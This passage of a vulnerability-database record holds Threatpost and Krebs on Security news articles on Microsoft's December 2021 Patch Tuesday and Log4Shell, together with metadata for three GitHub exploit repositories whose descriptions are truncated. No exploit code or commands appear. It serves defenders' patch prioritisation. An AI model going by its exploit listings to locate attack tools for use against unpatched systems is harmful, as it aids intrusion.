Print Spooler\n\nThe update does not address CVE-2021-24084, an unpatched Windows security vulnerability [disclosed in late November](<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>), which could allow information disclosure and local privilege escalation (LPE).\n\n## **Critical-Rated Microsoft Security Bugs for December**\n\n 1. ### **CVE-2021-43215 in iSNS Server**\n\nThe first critical bug ([CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)) to cover allows remote code-execution (RCE) on the Internet Storage Name Service (iSNS) server, which enables automated discovery and management of iSCSI devices on a TCP/IP storage network. It rates 9.8 out of 10 on the vulnerability-severity scale.\n\nThe bug can be exploited if an attacker sends a specially crafted request to an affected server, according to Microsoft\u2019s advisory.\n\n\u201cIn other words, if you\u2019re running a storage-area network (SAN) in your enterprise, you either have an iSNS server or you configure each of the logical interfaces individually,\u201d said Trend Micro Zero Day Initiative researcher Dustin Childs, in a [Tuesday blog](<https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review>). \u201cIf you have a SAN, prioritize testing and deploying this patch.\u201d\n\nBreen concurred that it\u2019s critical to patch quickly if an organization operates iSNS services.\n\n\u201cRemember that this is not a default component, so check this before you bump it up the list,\u201d he said via email. However, \u201cas this protocol is used to facilitate data storage over the network, it would be a high priority target for attackers looking to damage an organization\u2019s ability to recover from attacks like ransomware. These services are also typically trusted from a network perspective \u2013 which is another reason attackers would choose this kind of target.\u201d\n\n 2. ### **CVE-2021-43907 in Visual Studio Code WSL Extension**\n\nAnother 9.8-out-of-10-rated bug is [CVE-2021-43907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907>), an RCE issue in Visual Studio Code WSL Extension that Microsoft said can be exploited by an unauthenticated attacker, with no user interaction. It didn\u2019t provide further details.\n\n\u201cThis impacted component lets users use the Windows Subsystem for Linux (WSL) as a full-time development environment from Visual Studio Code,\u201d Childs explained. \u201cIt allows you to develop in a Linux-based environment, use Linux-specific tool chains and utilities, and run and debug Linux-based applications all from within Windows. This sort of cross-platform functionality is used by many in the DevOps community.\u201d\n\n 3. ### **CVE-2021-43899 \u2013 Microsoft 4K Wireless Display Adapter **\n\nThe third and final 9.8 CVSS-rate bug is [CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>), which also allows RCE on an affected device, if the attacker has a foothold on the same network as the Microsoft 4K Display Adapter. Exploitation is a matter of sending specially crafted packets to the affected device, according to Microsoft.\n\n\u201cPatching this won\u2019t be an easy chore,\u201d Childs said. \u201cTo be protected, users need to install the Microsoft Wireless Display Adapter application from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Only then can [they] use the \u2018Update & Security\u2019 section of the app to download the latest firmware to mitigate this bug.\u201d\n\n 4. ### **CVE-2021-43905 in Microsoft Office**\n\nAnother critical RCE bug ([CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)) exists in the Microsoft Office app; it rates 9.6 on the CVSS vulnerability-severity scale, and Microsoft marked it as \u201cexploitation more likely.\u201d\n\n\u201cVery little is given away in the advisory to identify what the immediate risk is \u2013 it simply states the affected product as \u2018Office App,'\u201d Breen noted. \u201cThis can make it difficult for security teams to prioritize or put mitigations in place if quick patching is not available \u2013 especially when security teams are already tied down with other critical patching.\u201d\n\nHowever, Aleks Haugom, researcher at Automox, said it should be a priority for patching.\n\n\u201cAs a low-complexity vulnerability, an attacker can expect repeated results,\u201d he said in a [Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-on-december-2021-patch-tuesday-release>). \u201cAlthough Microsoft has not disclosed exactly what user interaction is required for the attacker to succeed they have confirmed that the Preview Pane is not an attacker vector. Given that this threat can impact resources beyond the security scope managed by the security authority immediate remediation actions are advised.\u201d\n\n 5. ### **CVE-2021-42310** **in Microsoft Defender for IoT**\n\nOne of 10 issues found in Defender for IoT, this bug ([CVE-2021-42310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42310>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cA password reset request consists of a signed JSON document, a signing certificate, and an intermediate certificate that was used to sign the signing certificate,\u201d explained Childs. \u201cThe intermediate certificate is supposed to chain up to a root CA certificate built into the appliance. Due to a flaw in this process, an attacker can reset someone else\u2019s password. Patching these bugs requires a sysadmin to [take action](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-manage-the-on-premises-management-console#update-the-software-version>) on the device itself.\u201d\n\nThe other nine bugs in the platform include seven other RCE vulnerabilities, one elevation of privilege vulnerability and one data disclosure vulnerability, all rated \u201cimportant.\u201d\n\n 6. ### **CVE-2021-43217 in the Windows Encrypting File System (EFS) **\n\nThis bug ([CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cAn attacker could cause a buffer overflow that would leading to unauthenticated non-sandboxed code execution, even if the EFS service isn\u2019t running at the time,\u201d Childs explained. \u201cEFS interfaces can trigger a start of the EFS service if it is not running.\u201d\n\nJay Goodman, in the Automox posting, noted that it can be chained with the publicly disclosed elevation of privilege vulnerability in EFS and thus presents a special threat.\n\n\u201cWhile either of these vulnerabilities constitute impactful disclosures that need to be handled quickly, the combination of the two in a near universal service critical to securing and protecting data creates a unique situation,\u201d he said. \u201cAttacks could use the combination of RCE with privilege elevation to quickly deploy, elevate and execute code on a target system with full system rights. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread laterally.\u201d\n\nIn other words: This is a critical pair of vulnerabilities to address as soon as possible to minimize organizational risk.\n\n 7. ### **CVE-2021-43233 in Remote Desktop Client **\n\nThe flaw ([CVE-2021-43233](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)) allows RCE and rates 7 on the CVSS scale. It\u2019s listed as \u201cexploitation more likely.\u201d\n\n\u201cThis one\u2026would likely require a social engineering or phishing component to be successful,\u201d Breen explained. \u201cA similar vulnerability, [CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>), was reported and patched in November. While it was also marked as \u2018exploitation more likely,\u2019 thankfully there have been no reports of proof-of-concept code or of it being exploited in the wild, which goes to show how important it is to make your own risk-based approach to prioritizing patches.\u201d\n\nAutomox researcher Gina Geisel emphasized the bug\u2019s high complexity for exploitation.\n\n\u201cTo exploit this vulnerability, an attacker requires control of a server and then must convince users to connect to it, through social engineering, DNS poisoning or using a man-in-the-middle (MITM) technique, as examples,\u201d she said. \u201cAn attacker could also compromise a legitimate server, host malicious code on it, and wait for the user to connect.\u201d\n\n## **Other Microsoft Bugs of Note for December**\n\nChilds also flagged [CVE-2021-42309](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42309>), an RCE issue in Microsoft SharePoint Server, as a vulnerability to prioritize. It allows an attacker to bypass the restriction against running arbitrary server-side web controls.\n\n\u201cThe vulnerability allows a user to elevate and execute code in the context of the service account,\u201d he explained. \u201cAn attacker would need \u2018Manage Lists\u2019 permissions on a SharePoint site, but by default, any authorized user can create their own new site where they have full permissions.\u201d\n\nHe said the issue is similar to the previously patched [CVE-2021-28474](<https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict>), except that the unsafe control \u201cis \u2018smuggled\u2019 in a property of an allowed control.\u201d\n\nOperating system bugs should be prioritized, researchers added.\n\n\u201cThe disclosures include a functional example in the case of the Print Spooler, proof-of-concept for the NTFS and Windows Installer vulnerabilities, so there is some cause to put urgency on the OS updates this month,\u201d Chris Goettl, vice president of product management at Ivanti, told Threatpost.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-14T22:21:35", "type": "threatpost", "title": "Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-28474", "CVE-2021-38666", "CVE-2021-41333", "CVE-2021-41379", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43240", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43893", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907"], "modified": "2021-12-14T22:21:35", "id": "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "href": "https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-18T07:04:57", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-21T01:51:41", "type": "githubexploit", "title": "Exploit for Exposure of Resource to Wrong Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43224"], "modified": "2022-07-09T19:51:24", "id": "BCFEE285-529F-5A1A-95A0-0775ED804D32", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-09-18T10:00:06", "description": "# Blank Space\n\nBlank Space is a refactoring of James Forshaw's [...", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-04T17:11:00", "type": "githubexploit", "title": "Exploit for Exposure of Resource to Wrong Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2023-09-18T08:17:39", "id": "3F3E7B37-A718-509B-BDC5-A78248C7D538", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-20T21:38:55", "description": "# shakeitoff\r\n\r\nA smaller, minimized, and cleaner version of [In...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T19:15:59", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883"], "modified": "2022-03-20T15:46:42", "id": "DF9C9272-7F4D-5362-A6BF-18A60A5E907D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "krebs": [{"lastseen": "2021-12-23T19:27:26", "description": "**Microsoft**, **Adobe**, and **Google** all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "**Log4Shell**" 0-day exploit in a popular **Java** library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\nLog4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called "**log4j**," which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.\n\nAccording to researchers at **Lunasec**, many, many services are vulnerable to this exploit.\n\n"Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable," Lunasec [wrote](<https://www.lunasec.io/docs/blog/log4j-zero-day/>). "Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled [here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>)."\n\n"If you run a server built on open-source software, there\u2019s a good chance you are impacted by this vulnerability," said **Dustin Childs** of Trend Micro's Zero Day Initiative. "Check with all the vendors in your enterprise to see if they are impacted and what patches are available."\n\nPart of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said **Johannes Ullrich**, an incident handler and blogger for the **SANS Internet Storm Center**. "Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon," Ullrich said. "Treat it as such." SANS has [a good walk-through](<https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/>) of how simple yet powerful the exploit can be.\n\n**John Hultquist**, vice president of intelligence analysis at **Mandiant**, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.\n\n"We anticipate other state actors are doing so as well, or preparing to," Hultquist said. "We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting."\n\nResearcher **Kevin Beaumont** had a more lighthearted take on Log4Shell [via Twitter](<https://twitter.com/GossiTheDog/status/1470787395805192199>):\n\n"Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly."\n\nThe** Cybersecurity and Infrastructure Security Agency** (CISA) has joined with the **FBI**, **National Security Agency** (NSA) and partners abroad in publishing [an advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>) to help organizations mitigate Log4Shell and other Log4j-related vulnerabilities.\n\nA half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire "critical" rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.\n\nThe Windows flaw already seeing active exploitation is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), which is a "spoofing" bug in the **Windows AppX installer** on **Windows 10.** Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like [Emotet](<https://krebsonsecurity.com/?s=Emotet>), [Trickbot](<https://krebsonsecurity.com/?s=trickbot>), and [BazaLoader](<https://www.proofpoint.com/us/blog/threat-insight/bazaflix-bazaloader-fakes-movie-streaming-service>).\n\n**Kevin Breen**, director of threat research for Immersive Labs, said [CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>) stands out of this month's patch batch.\n\n"Not only for its high [CVSS score](<https://www.techtarget.com/searchsecurity/definition/CVSS-Common-Vulnerability-Scoring-System>) of 9.6, but also because it\u2019s noted as 'exploitation more likely'," Breen observed.\n\nMicrosoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), an elevation of privilege vulnerability in Windows Installer.\n\n"This appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November," **Satnam Narang** of Tenable points out. "However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month."\n\nGoogle issued five security fixes for **Chrome**, including one rated critical and three others with high severity. If you\u2019re browsing with Chrome, keep a lookout for when you see an \u201cUpdate\u201d tab appear to the right of the address bar. If it\u2019s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAlso, Adobe issued patches to correct more than 60 security flaws in [a slew of products,](<https://helpx.adobe.com/security.html>) including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.\n\nStandard disclaimer: Before you update Windows, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.\n\nAdditional reading:\n\n[SANS ISC listing](<https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/>) of each Microsoft vulnerability patched today, indexed by severity and affected component.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T22:23:44", "type": "krebs", "title": "Microsoft Patch Tuesday, December 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-14T22:23:44", "id": "KREBS:4CBEC9501222521F7CCF1D5ECAD51297", "href": "https://krebsonsecurity.com/2021/12/microsoft-patch-tuesday-december-2021-edition/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}